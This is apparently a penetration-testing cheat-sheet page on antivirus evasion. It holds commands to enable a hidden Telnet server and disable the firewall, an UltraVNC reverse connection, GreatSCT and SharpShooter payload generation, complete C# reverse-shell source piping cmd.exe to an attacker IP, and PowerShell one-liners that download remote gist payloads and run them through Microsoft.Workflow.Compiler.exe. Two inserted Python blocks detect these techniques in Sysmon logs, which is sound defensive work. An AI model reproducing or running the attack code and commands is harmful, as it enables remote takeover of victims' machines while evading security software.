# AV Bypass

## **Telnet Server**

Until Windows 10, every Windows version shipped with a **Telnet server** that an administrator could install with:

```
pkgmgr /iu:"TelnetServer" /quiet
```

Make it **start** automatically at boot (running as LocalSystem):

```
sc config TlntSVR start= auto obj= localsystem
```

**Change the telnet port** (stealthier) and disable the firewall:

```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```

## UltraVNC

Download it from: <http://www.uvnc.com/downloads/ultravnc.html>

**Execute** ***winvnc.exe*** and configure the server:

* Enable the option *Disable TrayIcon*
* Set a password in *VNC Password*
* Set a password in *View-Only Password*

Then, move the binary ***winvnc.exe*** and the **newly** created file ***UltraVNC.ini*** onto the **victim**.

### **Reverse connection**

The **attacker** should **execute on** their **host** the binary `vncviewer.exe -listen 5900` so it is **prepared** to catch a reverse **VNC connection**.\
Then, execute on the **victim**: `winvnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
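The two staging sequences above (telnet server install, autostart, port change and firewall-off; UltraVNC launched with `-connect`) leave distinctive process command lines behind. The detection logic below is an added example written for this page, not code from the original page or from any of the tools it links: it scores Sysmon Event ID 1 style process-creation records per host, so that one strong indicator or a chain of weaker ones raises an alert. The field names (`Computer`, `CommandLine`), the rule weights, the threshold and the sample events are all assumptions made for this example.

```python
"""Added detection example (not code from the original page or its linked tools):
score Sysmon Event ID 1 style process-creation records against the telnet-server
and UltraVNC staging command lines described above. Field names, rule weights,
the alert threshold and the sample events are assumptions made for this example."""
import re

# (rule name, regex applied to the lower-cased command line, weight)
RULES = [
    ("telnet_server_install",    re.compile(r'pkgmgr(?:\.exe)?\s+/iu:"?telnetserver'), 2),
    ("telnet_service_autostart", re.compile(r'\bsc(?:\.exe)?\s+config\s+tlntsvr\b.*start=\s*auto'), 1),
    # any port other than the default 23 (e.g. 80 to blend in with web traffic)
    ("telnet_port_changed",      re.compile(r'tlntadmn(?:\.exe)?\s+config\s+port=(?!23\b)\d+'), 2),
    ("firewall_disabled",        re.compile(r'netsh(?:\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off'), 2),
    ("vnc_reverse_connect",      re.compile(r'winvnc(?:\.exe)?\b.*\s-connect\s+\S+'), 3),
]
ALERT_THRESHOLD = 3   # assumption: one strong indicator, or two weaker ones, per host


def match_event(event):
    """Names of all rules whose regex matches this event's command line."""
    cmd = event.get("CommandLine", "").lower()
    return [name for name, rx, _ in RULES if rx.search(cmd)]


def score_hosts(events):
    """Per host: the distinct rules matched and the sum of their weights."""
    weights = {name: w for name, _, w in RULES}
    hosts = {}
    for event in events:
        entry = hosts.setdefault(event["Computer"], {"rules": set(), "score": 0})
        entry["rules"].update(match_event(event))
    for entry in hosts.values():
        entry["score"] = sum(weights[r] for r in entry["rules"])
        entry["rules"] = sorted(entry["rules"])
    return hosts


def find_alerts(events):
    """Hosts whose accumulated score reaches the threshold, sorted by name."""
    return sorted(h for h, e in score_hosts(events).items() if e["score"] >= ALERT_THRESHOLD)


# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": "CORP\\alice", "Image": r"C:\Windows\System32\pkgmgr.exe",
     "CommandLine": 'pkgmgr /iu:"TelnetServer" /quiet'},
    {"Computer": "WS01", "User": "CORP\\alice", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc config TlntSVR start= auto obj= localsystem"},
    {"Computer": "WS01", "User": "CORP\\alice", "Image": r"C:\Windows\System32\tlntadmn.exe",
     "CommandLine": "tlntadmn config port=80"},
    {"Computer": "WS01", "User": "CORP\\alice", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    # benign: an admin only listing the firewall state
    {"Computer": "WS02", "User": "CORP\\bob", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall show allprofiles"},
    {"Computer": "WS03", "User": "CORP\\carol", "Image": r"C:\Users\Public\winvnc.exe",
     "CommandLine": "winvnc.exe -autoreconnect -connect 203.0.113.10::5900"},
]

if __name__ == "__main__":
    for host, entry in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score={entry['score']} rules={entry['rules']}")
    print("alerts:", find_alerts(SAMPLE_EVENTS))
```

Scoring per host rather than per event is what makes the telnet chain visible: none of its four commands is conclusive alone (an administrator may legitimately run `sc config` or `netsh advfirewall`), but the full sequence on one machine is. The `winvnc -connect` rule is weighted so that a single reverse VNC connection alerts by itself.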

## GreatSCT

Download it from: <https://github.com/GreatSCT/GreatSCT>

```
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py
```

Inside GreatSCT:

```
use 1
list #List the available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
set lport 4444
generate #"payload" is the default name
#This generates a meterpreter xml and an .rc file for msfconsole
```

Now **start the listener** with `msfconsole -r file.rc` and **execute** the **xml payload** with:

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```

**Current Defender will terminate the process very fast.**

## Compiling our own reverse shell

<https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15>

#### First C# reverse shell

Compile it with:

```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```

Use it with (the name must match the `/out:` given to the compiler):

```
back2.exe <ATTACKER_IP> <PORT>
```

```csharp
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
    public class Program
    {
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
            {
                using(Stream stream = client.GetStream())
                {
                    using(StreamReader rdr = new StreamReader(stream))
                    {
                        streamWriter = new StreamWriter(stream);

                        StringBuilder strInput = new StringBuilder();

                        Process p = new Process();
                        p.StartInfo.FileName = "cmd.exe";
                        p.StartInfo.CreateNoWindow = true;
                        p.StartInfo.UseShellExecute = false;
                        p.StartInfo.RedirectStandardOutput = true;
                        p.StartInfo.RedirectStandardInput = true;
                        p.StartInfo.RedirectStandardError = true;
                        p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                        p.Start();
                        p.BeginOutputReadLine();

                        while(true)
                        {
                            strInput.Append(rdr.ReadLine());
                            //strInput.Append("\n");
                            p.StandardInput.WriteLine(strInput);
                            strInput.Remove(0, strInput.Length);
                        }
                    }
                }
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

    }
}
```

<https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs>

## C# using Microsoft.Workflow.Compiler.exe

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
```

[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)

[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)

Automatic download and execution (64-bit):

```
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
```

32-bit:

```
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
```

{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}

C# obfuscators list: <https://github.com/NotPrab/.NET-Obfuscator>
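The three C# sections above all rely on a signed Microsoft compiler that is already on the box (`csc.exe` producing `back2.exe`, `msbuild.exe` running an inline-task `.xml`, `Microsoft.Workflow.Compiler.exe` compiling a `.txt` source), which is exactly what a defender can key on. The correlation below is an added example written for this page, not code from the original page or the linked gists: it walks Sysmon-style records in time order, flags the unusual compiler invocations, remembers where `csc.exe /out:` writes its binary, and raises a higher-confidence finding when that freshly compiled binary makes an outbound connection within a short window. The field names (`EventID`, `UtcTime`, `Image`, `CommandLine`, `CurrentDirectory`, `DestinationIp`, `DestinationPort`), the ten-minute window and the sample events are assumptions made for this example.

```python
"""Added correlation example (not code from the original page or the linked gists):
tie the compiler LOLBins used above (csc.exe, msbuild.exe, Microsoft.Workflow.Compiler.exe)
to what they produce. Records are constructed in Sysmon style, EventID 1 (process
create) and EventID 3 (network connect); field names, the time window and the
sample data are assumptions made for this example."""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

COMPILERS = {"csc.exe", "msbuild.exe", "microsoft.workflow.compiler.exe"}
WINDOW = timedelta(minutes=10)   # assumption: compile-to-first-connection gap worth alerting on
OUT_ARG = re.compile(r'/out:("[^"]+"|\S+)', re.IGNORECASE)   # csc.exe output switch


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def image_name(path):
    return PureWindowsPath(path).name.lower()


def finding(rule, e, **extra):
    return {"rule": rule, "host": e["Computer"], "image": e["Image"], "time": e["UtcTime"], **extra}


def correlate(events):
    """Walk the stream in time order; return findings as dicts."""
    findings, outputs = [], {}   # outputs: normalised exe path -> compile time
    for e in sorted(events, key=lambda ev: parse_time(ev["UtcTime"])):
        if e["EventID"] == 1:
            name, cmd = image_name(e["Image"]), e["CommandLine"]
            if name not in COMPILERS:
                continue
            if name == "microsoft.workflow.compiler.exe":
                # Rare outside workflow tooling; above it compiles a .txt source
                findings.append(finding("workflow_compiler_executed", e))
            elif name == "msbuild.exe" and re.search(r"\S+\.xml\b", cmd, re.IGNORECASE):
                # Inline-task project passed as a bare .xml rather than a .csproj/.sln
                findings.append(finding("msbuild_xml_project_executed", e))
            elif name == "csc.exe":
                m = OUT_ARG.search(cmd)
                if m:   # remember where the produced binary will land
                    out = PureWindowsPath(e.get("CurrentDirectory", "")) / m.group(1).strip('"')
                    outputs[str(out).lower()] = parse_time(e["UtcTime"])
                if re.search(r"\.txt\b", cmd, re.IGNORECASE):
                    findings.append(finding("csc_source_with_txt_extension", e))
        elif e["EventID"] == 3:
            img = str(PureWindowsPath(e["Image"])).lower()
            compiled_at = outputs.get(img)
            if compiled_at is not None and parse_time(e["UtcTime"]) - compiled_at <= WINDOW:
                findings.append(finding("fresh_compiled_binary_outbound", e,
                                        dest=f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
    return findings


# Constructed sample telemetry, not real events. Sysmon's CurrentDirectory carries a
# trailing backslash; PureWindowsPath joins correctly with or without it.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-03-01 09:00:00.000", "Computer": "WS07",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CurrentDirectory": r"C:\Users\Public\Documents",
     "CommandLine": r"csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt"},
    {"EventID": 1, "UtcTime": "2024-03-01 09:00:05.000", "Computer": "WS07",
     "Image": r"C:\Users\Public\Documents\back2.exe", "CurrentDirectory": r"C:\Users\Public\Documents",
     "CommandLine": "back2.exe 203.0.113.10 4444"},
    {"EventID": 3, "UtcTime": "2024-03-01 09:00:06.000", "Computer": "WS07",
     "Image": r"C:\Users\Public\Documents\back2.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
    {"EventID": 1, "UtcTime": "2024-03-01 09:10:00.000", "Computer": "WS07",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "CurrentDirectory": r"C:\Users\Public", "CommandLine": "msbuild.exe payload.xml"},
    {"EventID": 1, "UtcTime": "2024-03-01 09:12:00.000", "Computer": "WS07",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe",
     "CurrentDirectory": r"C:\Users\Public",
     "CommandLine": "Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell"},
    # benign: a developer build into a source tree whose output connects out much later
    {"EventID": 1, "UtcTime": "2024-03-01 09:30:00.000", "Computer": "DEV01",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CurrentDirectory": r"C:\src\app", "CommandLine": r"csc.exe /t:exe /out:bin\app.exe Program.cs"},
    {"EventID": 3, "UtcTime": "2024-03-01 11:00:00.000", "Computer": "DEV01",
     "Image": r"C:\src\app\bin\app.exe", "DestinationIp": "10.0.0.20", "DestinationPort": 443},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```

The compile-then-connect correlation is the part worth keeping: a compiler alone is noise on a developer workstation, but a binary that `csc.exe` wrote seconds earlier and that immediately opens a socket to an address outside the estate is the pattern the "undetectable" reverse shell above produces regardless of how its source is obfuscated.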

## C++

```
sudo apt-get install mingw-w64

i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
```

<https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp>

Merlin, Empire, Pupy, SalsaTools <https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/>

<https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf>

<https://github.com/l0ss/Grouper2>

{% embed url="http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html" %}

{% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}

## Other tools

```bash
# Veil Framework:
# https://github.com/Veil-Framework/Veil

# Shellter
# https://www.shellterproject.com/download/

# SharpShooter
# https://github.com/mdsecactivebreach/SharpShooter
# JavaScript payload, stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut:
# https://github.com/TheWover/donut

# Vulcan
# https://github.com/praetorian-code/vulcan
```

## More

{% embed url="https://github.com/EgeBalci/sgn" %}

{% embed url="https://github.com/persianhydra/Xeexe-TopAntivirusEvasion" %}

